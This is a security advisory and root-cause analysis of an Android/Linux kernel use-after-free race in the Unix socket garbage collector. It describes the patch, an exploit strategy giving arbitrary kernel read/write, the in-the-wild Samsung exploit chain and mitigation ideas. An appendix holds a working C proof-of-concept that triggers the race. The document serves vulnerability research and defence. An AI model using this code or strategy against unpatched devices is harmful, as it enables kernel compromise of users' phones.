Xingyu Jin, Android Security Research

The Basics

Disclosure or Patch Date: November 5, 2021

**Product:**Google Android

Advisory: https://source.android.com/security/bulletin/2021-11-01#kernel-components

Affected Versions: Pre-Nov 5 2021 SPL for devices released prior to Nov 2022

First Patched Version: 5 Nov 2021 SPL+

Issue/Bug Report: A-196926917

Patch CL: https://android.googlesource.com/kernel/common/+/cbcf01128d0a92e131bd09f1688fe032480b65ca

Bug-Introducing CL: Unknown

Reporter(s): Anonymous

The Code

Proof-of-concept: See the appendix

Exploit sample: N/A

Did you have access to the exploit sample when doing the analysis? Yes

The Vulnerability

Bug class: use-after-free (UAF)

Vulnerability details:

There is a race condition where the garbage collector can treat an inflight socket as a garbage candidate, while the file reference count is incremented at the same time. This occurs when the syscall recvmsg is called with the MSG_PEEK flag. The accidental increase on the reference count can alter the internal state of the garbage collector and lead to sk_buff object use-after-free. See this blog post for the full explanation.

Patch analysis:

The kernel forces recvmsg syscall with MSG_PEEK flag to synchronize with GC. By doing so, it’s impossible for the receiver to obtain a file descriptor with an elevated reference count.

+       spin_lock(&unix_gc_lock);
+       spin_unlock(&unix_gc_lock);

Thoughts on how this vuln might have been found (fuzzing, code auditing, variant analysis, etc.): “fuzzing”: the bug was found in 2016 by a developer who heavily used SCM_RIGHTS + MSG_PEEK.

(Historical/present/future) context of bug: The bug was found in 2016 according to the public Linux kernel email thread, but the patch was not accepted.

The Exploit

(The terms exploit primitive, exploit strategy, exploit technique, and exploit flow are defined here.)

Exploit strategy (or strategies):

The sk_buff->data from the use-after-free sk_buff object may be occupied by a scm_fp_list object, which leads to leak a set of file structure pointers. Since several file structures may occupy an entire newly allocated slab page, the exploit is able to know the page address and control the page content by freeing the corresponding file descriptors and spraying slab pages. The exploit may put several fake pipe structures on a controlled slab page and link up with a file by skb_unlink. Thus, pipe_buffer->page and pipe_buffer->offset can be abused to implement arbitrary read / write primitives.

Exploit flow:

The vulnerable GC may be tricked into a spectacular convoluted file descriptor transmission scenario with two threads use recvmsg syscall to retrieve transmitted file descriptors at the same time. After GC completes, a thread may receive a use-after-free sk_buff object. Moreover, several additional threads need to perform heap spray, fix kernel structures and manipulate the kernel scheduler in the meantime. To prolong the GC process for winning the race condition, an exploit may intentionally create a number of garbage objects.

Known cases of the same exploit flow:

No

Part of an exploit chain?

Yes, this is part of an in the wild Samsung full chain exploit. The other part for RCE is Samsung browser in the wild 0day CVE-2021-38000 and Chrome Nday CVE-2020-16040.

The Next Steps

Variant analysis

Areas/approach for variant analysis (and why): code auditing because the GC implementation is too complex for a fuzzer to easily spot any security bugs

Found variants: CVE-2021-4083 by Jann Horn

Structural improvements

What are structural improvements such as ways to kill the bug class, prevent the introduction of this vulnerability, mitigate the exploit flow, make this type of vulnerability harder to exploit, etc.?

Ideas to kill the bug class: Have a formal model of the file lifecycle and the GC, or a specialized race fuzzer for fuzzing GC.

Ideas to mitigate the exploit flow: CONFIG_SLAB_FREELIST_RANDOM should be a required mitigation for Android to reduce the possibility of heap shaping.

Other potential improvements: Documenting the precise semantics of the lifecycle states and reference states of complicated kernel structures (e.g. struct file).

0-day detection methods

What are potential detection methods for similar 0-days? Meaning are there any ideas of how this exploit or similar exploits could be detected as a 0-day?

Potential signal: a program generates a number of garbage objects, with other suspicious threads that pin different cpu core and tweak task affinity.

Other References

Appendix

// aarch64-linux-gnu-gcc-10 poc.c -o poc -static -lpthread
#define _GNU_SOURCE /* See feature_test_macros(7) */
#include <fcntl.h>
#include <pthread.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
 
#define __int64 long
#define __int8 char
 
int sv[2];
pthread_mutex_t condition_mutex_recvmsg;
pthread_mutex_t condition_mutex_recv;
int g_victim_sock_fd;
pthread_mutex_t condition_mutex_gc;
pthread_cond_t condition_cond_gc;
pthread_cond_t condition_cond_recvmsg;
 
// helpers
static void send_fd(int socket, int fd)  // send fd by socket
{
  struct msghdr msg = {0};
  char buf[CMSG_SPACE(sizeof(fd))];
  memset(buf, '\0', sizeof(buf));
  struct iovec io = {.iov_base = "", .iov_len = 1};
  msg.msg_iov = &io;
  msg.msg_iovlen = 1;
  msg.msg_control = buf;
  msg.msg_controllen = sizeof(buf);
  struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
  cmsg->cmsg_level = SOL_SOCKET;
  cmsg->cmsg_type = SCM_RIGHTS;
  cmsg->cmsg_len = CMSG_LEN(sizeof(fd));
  *((int *)CMSG_DATA(cmsg)) = fd;
  msg.msg_controllen = CMSG_SPACE(sizeof(fd));
  if (sendmsg(socket, &msg, 0) < 0) perror("Failed to send message send_fd");
}
 
static void send_fds(int socket, int *fds, int num_fds, int num_iovs) {
  struct msghdr msg = {0};
  char buf[CMSG_SPACE(num_fds * sizeof(int))];
  memset(buf, '\0', sizeof(buf));
  struct iovec io[num_iovs];
  for (int i = 0; i < num_iovs; i++) {
    io[i].iov_base = "A";
    io[i].iov_len = 2;
  }
  msg.msg_iov = io;
  msg.msg_iovlen = num_iovs;
  msg.msg_control = buf;
  msg.msg_controllen = sizeof(buf);
  struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
  cmsg->cmsg_level = SOL_SOCKET;
  cmsg->cmsg_type = SCM_RIGHTS;
  cmsg->cmsg_len = CMSG_LEN(num_fds * sizeof(int));
  memcpy(cmsg->__cmsg_data, fds, num_fds * sizeof(int));
  if (sendmsg(socket, &msg, 0) < 0) perror("Failed to send message send_fds");
}
 
__int64 pin_cpu(int core_id) {
  cpu_set_t mask;
  CPU_ZERO(&mask);
  CPU_SET(core_id, &mask);
  return sched_setaffinity(0, sizeof(mask), &mask);
}
 
// thread to trigger unix_gc()
void t_main_gc_simple(__int64 a1, __int64 a2) {
  int v3;
  int fd;
 
  setpriority(PRIO_PROCESS, 0, -19);
  pin_cpu(3LL);
  pthread_mutex_lock(&condition_mutex_gc);
  pthread_cond_wait(&condition_cond_gc, &condition_mutex_gc);
  pthread_mutex_unlock(&condition_mutex_gc);
  fd = socket(1, 1, 0);  // AF_LOCAL, SOCK_STREAM
  v3 = socket(1, 1, 0);
  setpriority(PRIO_PROCESS, 0, -18);
  close(fd);
  pthread_cond_signal(&condition_cond_recvmsg);
  close(v3);
  usleep(0x186A0u);
}
 
int fd_34[2];
int local_spair[2];
 
__int64 setup_race(int a1) {
  __int64 result;
  __int64 v3;
  int v4[3];
  int v5[710];
  int local_spair[2];
  int v7;
  int v8;
  int prio;
  int fd;
  int j;
  int k;
  signed int i;
 
  i = 0;
  k = 0;
  setpriority(PRIO_PROCESS, 0, 19);
  fd = socket(1, 1, 0);
  close(fd);
  usleep(0x61A80u);
  i = 0;
  k = 0;
  socketpair(1, 1, 0, fd_34);
  send_fd(sv[0], fd_34[1]);
  send_fd(fd_34[0], fd_34[0]);
  for (int i = 0; i <= 99; ++i) {
    socketpair(1, 1, 0, &v5[2 * i + 510]);
    for (int k = 0; k <= 4; ++k) v5[5 * i + 10 + k] = socket(1, 1, 0);
  }
  for (int i = 0; i <= 99; ++i) {
    send_fd(fd_34[1], v5[2 * i + 511]);
    for (int k = 0; k <= 4; ++k) {
      send_fd(v5[2 * i + 510], v5[5 * i + 10 + k]);
      close(v5[5 * i + 10 + k]);
    }
    close(v5[2 * i + 511]);
    close(v5[2 * i + 510]);
  }
  close(fd_34[1]);
  close(fd_34[0]);
  usleep(0x186A0u);
  pthread_cond_signal(&condition_cond_gc);
  usleep(0x186A0u);
  close(sv[0]);
}
 
__int64 t_recvmsg() {
  int v0;
  int v1;
  int *v2;
  int v4;
  int v5;
  __int64 v6;
  int v7;
  cpu_set_t v8;
  char v9;
  long v10[130];
  struct msghdr v11;
  long received_fds[10];
  int fd;
  int v14;
  int *received_fds_ptr;
  int v16;
  int v17;
 
  setpriority(PRIO_PROCESS, 0, 20);
  v9 = 0;
  memset(&v11, 0, sizeof(v11));
  v10[0] = &v9;
  v10[1] = 1LL;
  v11.msg_iov = &v10;
  v11.msg_iovlen = 1LL;
  v11.msg_control = received_fds;
  v11.msg_controllen = 20LL;
  received_fds_ptr = (int *)received_fds;
  received_fds[0] = 20LL;  // len
  v17 = 0;
  v14 = -1;
  pin_cpu(2LL);
  setpriority(PRIO_PROCESS, 0, -19);
  pthread_mutex_lock(&condition_mutex_recvmsg);
  pthread_cond_wait(&condition_cond_recvmsg, &condition_mutex_recvmsg);
  pthread_mutex_unlock(&condition_mutex_recvmsg);
  usleep(0xFAu);
  v0 = recvmsg(sv[1], &v11, 0x80042);
  v14 = v0 < 0;
  fd = received_fds_ptr[4];
  v1 = recvmsg(fd, &v11, 0x80042);  // data
  v14 = v1 < 0;
  g_victim_sock_fd = received_fds_ptr[4];
  usleep(0x3E8u);
  v5 = v4;
  v17 = 0;
  v16 = -1;
  v7 = recvmsg(fd, &v11, 0x80040);
  v14 = v7 < 0;
  v16 = received_fds_ptr[4];
  usleep(0x186A0u);
  close(fd);
  close(v16);
  close(sv[1]);
  pthread_exit(0LL);
  return 0LL;
}
 
void trigger() {
  pthread_t v18;
  pthread_t v20;
  pthread_t v21;
  void *arg;
  pthread_create(&v20, 0LL, (void *(*)(void *))t_main_gc_simple, 0LL);
  pthread_create(&v18, 0LL, (void *(*)(void *))t_recvmsg, 0LL);
  usleep(0x2710u);
  pthread_create(&v21, 0LL, (void *(*)(void *))setup_race, 0LL);
  pthread_join(v21, 0LL);
  pthread_join(v18, 0LL);
  pthread_join(v20, 0LL);
  usleep(10);
  puts("wut?");
}
 
int main(int argc, char **argv) {
  for (int i = 0; i < 20; i++) {
    if (socketpair(1, 1, 0, sv) != 0)
      printf("Failed to create Unix-domain socket pair\n");
    trigger();
  }
  return 0;
}